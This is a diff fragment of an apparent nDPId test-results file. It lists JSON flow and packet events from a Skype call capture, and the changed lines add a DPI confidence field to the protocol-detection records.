-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":741,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970655836,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":741,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970655836,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":742,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970655836,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.27","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":742,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1431970655836,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1431970655836,"pkt":"0NQSxnP1PBXCt3IOCABFAABBoCUAAEAR+GnAqAEiQTffGzLdnF0ALfl1ex8CqPqPm6RB3JLpE4+TALz\/NA1U\/CYbcdFd\/zzgY3E\/zKJhBw=="}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":742,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970655836,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.27","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":742,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970655836,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.27","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":743,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970655837,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.142","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":743,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1431970655837,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1431970655837,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6UqAAAEARkIPAqAEinTc4jjLdnE0AJphseyECmYsgkMQHN\/YIHMBu8w6RdZxUPKbDb+JHSqeN"}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":743,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970655837,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.142","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":743,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970655837,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.142","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":744,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970655837,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.154","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":744,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1431970655837,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1431970655837,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4DEcAAEARVQbAqAEiQAQXmjLdnGAAJHYfeyMC79DK\/hLwI0tI0UYsgGEWGk5hr4E5iC40QQ=="}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":744,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970655837,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.154","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":744,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970655837,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.154","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970655837,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1431970655837,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"ts_msec":1431970655837,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5ayYAAEARfGrAqAEinTg0ITLdnEIAJe9eeyUCb3+11x21V+othQ6FZpV0z1bnAthdPIEc8bI="}
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":745,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970655837,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":745,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970655837,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":2,"flow_last_seen":1431970656151,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431970656151,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtI2dODQswKgBIpxUyC6j+8V4XpsVFaASOJDYRQAAAgQFrAQCCApMZ\/6WPjHZGQEDAwk="}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":3,"flow_last_seen":1431970656151,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970656151,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0HiFAAEAGiXTAqAEinTg0LMgunFRemxUVo\/vFeYAQECwuNgAAAQEICj4x2lNMZ\/6W"}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":754,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":754,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1431970656861,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"ts_msec":1431970656861,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1wZMAAEARPVPAqAEib91KKjLdnEYAIaXieycCe1fKnMoPyS7sKN+ClU5dh7E8u7Wn6g=="}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":755,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.172","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":755,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1431970656861,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"ts_msec":1431970656861,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3VcEAAEAR2kbAqAEinTfrrDLdnFQAI1TmeykCBTNtXbhMDQf2D6UV0R3mHu30wTeW\/+eg"}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":755,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.172","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":755,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.172","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":756,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.167","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":756,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1431970656861,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"ts_msec":1431970656861,"pkt":"0NQSxnP1PBXCt3IOCABFAAAylicAAEARmerAqAEinTfrpzLdnF0AHsxpeysCNBmO6n4oPt4qGVJFTPBgQCMCbA=="}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":756,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.167","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":756,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.167","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":757,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":757,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1431970656861,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1431970656861,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+1C4AAEARDvPAqAEinTc4jDLdnEMAKhWUey0Ck6OV07meiCUQoBZZK2TePWK3VEloqo0Om\/LmRrc7qA=="}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":758,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.156","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":758,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1431970656861,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1431970656861,"pkt":"0NQSxnP1PBXCt3IOCABFAABBaS8AAEARxk7AqAEi1ceznDLdnF8ALXpUey8C35QflkiVLuyYHEgftQvOcxrFG1PZDcVv\/V5f70upN2kVjw=="}
-00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":758,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.156","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":758,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.156","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":764,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657448,"flow_last_seen":1431970657448,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970657448,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51247,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":764,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1431970657448,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970657448,"pkt":"0NQSxnP1PBXCt3IOCABFAABAHFJAAEAGizfAqAEinTg0LMgvAbu6eq5bAAAAALAC\/\/9TfQAAAgQFtAEDAwUBAQgKPjHfXgAAAAAEAgAA"}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":765,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":2,"flow_last_seen":1431970657789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431970657789,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtI2dODQswKgBIgG7yC\/usf9LunquXKASOJDxVgAAAgQFrAQCCApMaAAoPjHfXgEDAwk="}
@@ -389,55 +389,55 @@
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":768,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1431970657867,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970657867,"pkt":"0NQSxnP1PBXCt3IOCABFAABAUUpAAEAGahfAqAEib91Nr8gwnF4IVezmAAAAALAC\/\/8+qQAAAgQFtAEDAwUBAQgKPjHhAAAAAAAEAgAA"}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":769,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.13","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
